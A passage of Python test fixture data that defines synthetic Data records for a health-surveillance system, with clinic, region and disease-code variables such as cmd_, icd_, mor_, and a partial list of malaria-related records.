Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_26":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:20', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_27":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:21', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_28":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:22', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, 'alert': 1, 'alert_reason':'cmd_1', "ale_1": 1, 'cmd_43': 1,'cmd_48': 1, 'epi_1': 1, 'epi_2': 1, 'epi_3': 1, 'epi_4': 1, 'epi_5': 1, 'epi_6': 1, 'epi_7': 1, 'icd_1': 1, 'icd_113': 1, 'icd_168': 1, 'icd_17': 1, 'icd_188': 1, 'icd_2189': 1, 'icd_2194': 1, 'icd_321': 1, 'icd_35': 1, 'icd_380': 1, 'icd_391': 1, 'icd_4177': 1, 'icd_4183': 1, 'icd_421': 1, 'icd_461': 1, 'icd_488': 1, 'icd_530': 1, 'icd_68': 1, 'icd_804': 1, 'icd_91': 1, 'icd_9225': 1, 'icd_9643': 1, 'reg_4': 1, 'mat_0': 1, 'mat_1': 1, 'mat_2': 1, 'mat_3': 1, 'mat_4': 1, 'mat_5': 1, 'mat_6': 1, 'mat_7': 1, 'mat_8': 1, 'mat_9': 1, 'dea_0': 1, 'dea_1': 1, 'dea_2': 1, 'dea_3': 1, 'dea_4': 1, 'dea_5': 1, 'dea_6': 1, 'dea_7': 1, 'dea_8': 1, 'dea_9': 1, 'mor_1':1, 'mor_2':1, 'mor_3':1, 'mor_4':1, 'mor_5':1, 'mor_6':1, 'mor_7':1, 'mor_8':1, 'mor_9':1, 'mor_10':1, 'mor_11':1, 'mor_12':1, 'mor_13':1, 'mor_14':1, 'mor_15':1, 'mor_16':1, 'mor_17':1, 'mor_18':1, 'mor_19':1, 'mor_20':1, 'mor_21':1, 'mor_22':1, 'mor_23':1, 'mor_24':1, 'mor_25':1, 'mor_26':1, 'mor_27':1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:fe301f1b-c541-4dde-a355-1552b03e6b79', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_1":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:101', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_4":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:102', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_5":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:103', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_6":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:104', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_7":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:105', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_8":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:106', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_9":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:107', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_10":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:108', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_11":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:109', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_12":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:110', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_13":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:111', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_15":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:112', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_16":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:113', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_18":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:114', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_19":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:115', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_20":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:116', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_23":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:117', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_24":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:118', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_25":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:119', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_26":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:120', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_27":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:121', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_28":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:122', 'country': 1}),
]
malaria = [
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mlp_1": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b1', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mlp_2": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b2', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mlp_3": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b3', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mlp_4": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b4', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mlp_5": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b5', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mlp_6": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b6', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mlp_7": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b7', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mlp_8": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b8', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mlp_9": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b9', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_1": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b10', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_2": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b11', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_3": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b12', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_4": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b13', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_5": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b14', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_6": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b15', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_7": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b16', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_8": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b17', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_9": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b18', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_10": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b19', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_11": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b20', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_12": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b21', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_13": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b22', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_14": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b23', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_15": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b24', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_16": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b25', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_17": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b26', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_18": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b27', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_19": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b28', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_20": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b29', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_21": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b30', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_22": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b31', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_23": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b32', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_24": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b33', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_25": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b34', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_26": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b35', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_27": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b36', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_28": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b37', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_29": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b38', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_30": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b39', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_31": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b40', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_32": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b41', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_33": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b42', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_34": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b43', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_35": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b44', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_36": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b45', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_37": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b46', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_38": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b47', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_39": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b48', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_40": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b49', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_41": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b50', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_42": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b51', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_43": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b52', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_44": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b53', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_45": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b54', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_46": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b55', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_47": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b56', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_48": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b57', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_49": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b58', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_50": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b59', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_51": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b60', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_52": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b61', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_53": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b62', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_54": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b63', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_55": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b64', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_56": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b65', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_57": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b66', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_58": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b67', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_59": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b68', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_60": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b69', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_61": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b70', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_62": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b71', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_63": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b72', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_64": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b73', 'country': 1}),
